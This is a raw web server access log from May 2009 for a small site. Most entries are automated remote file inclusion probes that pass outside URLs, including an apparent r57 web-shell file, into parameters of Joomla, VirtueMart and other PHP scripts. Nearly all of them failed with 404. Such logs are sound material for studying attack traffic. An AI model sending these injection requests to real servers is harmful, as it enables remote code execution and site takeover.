71.254.105.60 - - [17/May/2009:07:12:40 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
71.254.105.60 - - [17/May/2009:07:12:40 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
121.173.130.41 - - [17/May/2009:07:13:48 -0400] "GET /logs/access_log.Q108062400//ashnews.php?pathtoashnews=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
79.45.98.65 - - [17/May/2009:07:13:50 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.826"
79.45.98.65 - - [17/May/2009:07:13:50 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 216 "-" "libwww-perl/5.826"
79.45.98.65 - - [17/May/2009:07:13:51 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.826"
121.173.130.41 - - [17/May/2009:07:13:52 -0400] "GET /logs/access_log.Q109050700//ashnews.php?pathtoashnews=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:07:14:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
79.45.98.65 - - [17/May/2009:07:14:23 -0400] "GET /logs/error_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.826"
85.214.86.93 - - [17/May/2009:07:14:51 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:07:14:51 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:07:14:51 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
216.129.119.47 - - [17/May/2009:07:15:47 -0400] "GET /logs/access_log.Q108123000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
79.45.98.65 - - [17/May/2009:07:15:55 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 216 "-" "libwww-perl/5.826"
85.214.86.93 - - [17/May/2009:07:16:53 -0400] "GET /logs/access_log.Q108090400%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
221.139.104.104 - - [17/May/2009:07:17:41 -0400] "GET /logs/access_log.Q109051200//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:07:17:51 -0400] "GET /logs/access_log.Q109051200%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:07:19:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.153.212.195 - - [17/May/2009:07:21:31 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:07:21:34 -0400] "GET /logs/access_log.Q109050300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:07:21:40 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.249.36.194 - - [17/May/2009:07:21:43 -0400] "GET /logs/access_log.Q109050300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gmissn.3dn.ru/id1.txt????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.249.36.194 - - [17/May/2009:07:21:43 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gmissn.3dn.ru/id1.txt????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.249.36.194 - - [17/May/2009:07:21:43 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gmissn.3dn.ru/id1.txt????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:07:22:04 -0400] "GET /logs/access_log.Q108090500//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.249.36.194 - - [17/May/2009:07:22:17 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gmissn.3dn.ru/id1.txt????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.249.36.194 - - [17/May/2009:07:22:17 -0400] "GET /logs/access_log.Q109050300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gmissn.3dn.ru/id1.txt????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.249.36.194 - - [17/May/2009:07:22:17 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gmissn.3dn.ru/id1.txt????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.249.36.194 - - [17/May/2009:07:22:25 -0400] "GET /logs/access_log.Q108090500//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gmissn.3dn.ru/id1.txt????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.249.36.194 - - [17/May/2009:07:22:51 -0400] "GET /logs/access_log.Q108090500//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gmissn.3dn.ru/id1.txt????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:07:22:52 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:07:22:52 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:07:22:52 -0400] "GET /logs/access_log.Q108082000//newspublish/include.php?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:07:22:53 -0400] "GET /logs/access_log.Q108122500//newspublish/include.php?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:07:24:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.153.212.195 - - [17/May/2009:07:24:44 -0400] "GET /logs/access_log.Q109050300%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:07:24:49 -0400] "GET /logs/access_log.Q108090500%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
64.118.90.253 - - [17/May/2009:07:25:19 -0400] "GET /logs/error_log.Q108103000/ray/modules/global/inc/header.inc.php?sIncPath=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.823"
64.118.90.253 - - [17/May/2009:07:25:19 -0400] "GET /ray/modules/global/inc/header.inc.php?sIncPath=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
64.118.90.253 - - [17/May/2009:07:25:19 -0400] "GET /logs/ray/modules/global/inc/header.inc.php?sIncPath=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.823"
66.249.72.114 - - [17/May/2009:07:26:45 -0400] "GET /logs/error_log.Q108081600 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.219.97.207 - - [17/May/2009:07:27:41 -0400] "GET /logs/access_log.Q109040300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
66.219.97.207 - - [17/May/2009:07:27:41 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
66.219.97.207 - - [17/May/2009:07:27:41 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
218.249.36.194 - - [17/May/2009:07:27:44 -0400] "GET /logs/access_log.Q109050300%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gmissn.3dn.ru/id1.txt????? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.249.36.194 - - [17/May/2009:07:27:48 -0400] "GET /logs/access_log.Q109050300%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gmissn.3dn.ru/id1.txt????? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.249.36.194 - - [17/May/2009:07:28:05 -0400] "GET /logs/access_log.Q108090500%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gmissn.3dn.ru/id1.txt????? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.249.36.194 - - [17/May/2009:07:28:10 -0400] "GET /logs/access_log.Q108090500%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gmissn.3dn.ru/id1.txt????? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:07:28:22 -0400] "GET /logs/access_log.Q108082000%20%20//newspublish/include.php?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:07:28:27 -0400] "GET /logs/access_log.Q108122500%20%20//newspublish/include.php?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.122.29.82 - - [17/May/2009:07:28:31 -0400] "GET / HTTP/1.1" 200 409 "-" "Java/1.6.0_04"
89.122.29.82 - - [17/May/2009:07:28:31 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Java/1.6.0_04"
89.122.29.82 - - [17/May/2009:07:28:32 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Java/1.6.0_04"
89.122.29.82 - - [17/May/2009:07:28:32 -0400] "GET /Includes HTTP/1.1" 301 247 "-" "Java/1.6.0_04"
89.122.29.82 - - [17/May/2009:07:28:34 -0400] "GET /images HTTP/1.1" 301 245 "-" "Java/1.6.0_04"
89.122.29.82 - - [17/May/2009:07:28:38 -0400] "GET /logs HTTP/1.1" 301 243 "-" "Java/1.6.0_04"
89.122.29.82 - - [17/May/2009:07:28:58 -0400] "GET /scripts HTTP/1.1" 301 246 "-" "Java/1.6.0_04"
89.122.29.82 - - [17/May/2009:07:28:59 -0400] "GET /images/LCALEN.HTM HTTP/1.1" 200 7943 "-" "Java/1.6.0_04"
89.122.29.82 - - [17/May/2009:07:29:01 -0400] "GET /logs/access_log.Q106121400 HTTP/1.1" 404 224 "-" "Java/1.6.0_04"
89.122.29.82 - - [17/May/2009:07:29:02 -0400] "GET /logs/access_log.Q106121500 HTTP/1.1" 404 224 "-" "Java/1.6.0_04"
209.59.12.99 - - [17/May/2009:07:29:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.90.91.245 - - [17/May/2009:07:29:15 -0400] "GET /logs/error_log.Q108103000/ray/modules/global/inc/header.inc.php?sIncPath=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.822"
209.90.91.245 - - [17/May/2009:07:29:15 -0400] "GET /ray/modules/global/inc/header.inc.php?sIncPath=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
209.90.91.245 - - [17/May/2009:07:29:15 -0400] "GET /logs/ray/modules/global/inc/header.inc.php?sIncPath=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.822"
72.30.79.49 - - [17/May/2009:07:29:30 -0400] "GET /scripts/browser_ie.js HTTP/1.0" 200 10686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.219.97.207 - - [17/May/2009:07:29:36 -0400] "GET /logs/access_log.Q109051200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
66.219.97.207 - - [17/May/2009:07:29:37 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
66.219.97.207 - - [17/May/2009:07:29:37 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
64.118.90.253 - - [17/May/2009:07:32:20 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.823"
64.118.90.253 - - [17/May/2009:07:32:20 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.823"
64.118.90.253 - - [17/May/2009:07:32:20 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.823"
209.90.91.245 - - [17/May/2009:07:32:30 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.822"
209.90.91.245 - - [17/May/2009:07:32:30 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.822"
209.90.91.245 - - [17/May/2009:07:32:30 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.822"
209.59.12.99 - - [17/May/2009:07:34:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.153.212.195 - - [17/May/2009:07:35:09 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:07:35:09 -0400] "GET /logs/access_log.Q109040700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:07:35:09 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:07:35:34 -0400] "GET //ashnews.php?pathtoashnews=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:07:35:34 -0400] "GET /logs//ashnews.php?pathtoashnews=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.221.130.26 - - [17/May/2009:07:35:50 -0400] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
77.221.130.26 - - [17/May/2009:07:35:50 -0400] "GET /logs/access_log.Q108091100/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
77.221.130.26 - - [17/May/2009:07:35:50 -0400] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
122.153.212.195 - - [17/May/2009:07:37:26 -0400] "GET /logs/access_log.Q108121200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
77.221.130.26 - - [17/May/2009:07:37:53 -0400] "GET /logs/access_log.Q109011000/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
77.221.130.26 - - [17/May/2009:07:38:04 -0400] "GET /logs/access_log.Q108091100/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
77.221.130.26 - - [17/May/2009:07:38:05 -0400] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
77.221.130.26 - - [17/May/2009:07:38:05 -0400] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
85.214.86.93 - - [17/May/2009:07:38:56 -0400] "GET /logs/access_log.Q109051200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:07:39:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.153.212.195 - - [17/May/2009:07:39:39 -0400] "GET /logs/access_log.Q109040700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.90.91.245 - - [17/May/2009:07:39:51 -0400] "GET /logs/access_log.Q109051200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.822"
122.153.212.195 - - [17/May/2009:07:39:57 -0400] "GET /logs/access_log.Q108121200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
77.221.130.26 - - [17/May/2009:07:39:59 -0400] "GET /logs/access_log.Q109011000/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
64.118.90.253 - - [17/May/2009:07:40:09 -0400] "GET /logs/access_log.Q109051200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.823"
77.221.130.26 - - [17/May/2009:07:40:14 -0400] "GET /logs/access_log.Q108091100%20/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
211.241.40.51 - - [17/May/2009:07:40:49 -0400] "GET /logs/forum.php?act=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:07:40:50 -0400] "GET /forum.php?act=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:07:40:50 -0400] "GET /logs/access_log.Q109021400/forum.php?act=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:07:40:50 -0400] "GET /logs/access_log.Q108111300/forum.php?act=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.27.203.107 - - [17/May/2009:07:40:53 -0400] "GET /logs/access_log.Q108100900%20%20//?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.27.203.107 - - [17/May/2009:07:40:53 -0400] "GET //?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.27.203.107 - - [17/May/2009:07:40:53 -0400] "GET /logs//?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 200 1691 "-" "Mozilla/5.0"
77.221.130.26 - - [17/May/2009:07:41:28 -0400] "GET /logs/access_log.Q108091100%20/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
211.241.40.51 - - [17/May/2009:07:41:47 -0400] "GET /logs/forum.php?act=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:07:41:48 -0400] "GET /forum.php?act=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:07:41:48 -0400] "GET /logs/access_log.Q108111300/forum.php?act=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:07:41:50 -0400] "GET /logs/access_log.Q109021400/forum.php?act=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
77.221.130.26 - - [17/May/2009:07:42:25 -0400] "GET /logs/access_log.Q108091100/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.burgmanspain.org/bots/hezid2.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
77.221.130.26 - - [17/May/2009:07:42:26 -0400] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.burgmanspain.org/bots/hezid2.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
77.221.130.26 - - [17/May/2009:07:42:26 -0400] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.burgmanspain.org/bots/hezid2.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
88.191.103.144 - - [17/May/2009:07:42:54 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:07:42:54 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:07:42:54 -0400] "GET /logs/access_log.Q109011700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:07:43:07 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:07:43:07 -0400] "GET /logs//agendax/addevent.inc.php?agendax_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:07:43:07 -0400] "GET /logs/access_log.Q108090900//agendax/addevent.inc.php?agendax_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:07:43:35 -0400] "GET /logs/access_log.Q108110900//agendax/addevent.inc.php?agendax_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:07:44:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.191.103.144 - - [17/May/2009:07:45:14 -0400] "GET /logs/access_log.Q109011700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:07:45:56 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:07:45:56 -0400] "GET /logs/access_log.Q109011700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:07:45:56 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
77.221.130.26 - - [17/May/2009:07:46:11 -0400] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.burgmanspain.org/bots/hezid2.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
121.173.130.41 - - [17/May/2009:07:47:23 -0400] "GET /logs/access_log.Q108090900%20%20//agendax/addevent.inc.php?agendax_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:07:47:42 -0400] "GET /logs/access_log.Q108110900%20%20//agendax/addevent.inc.php?agendax_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
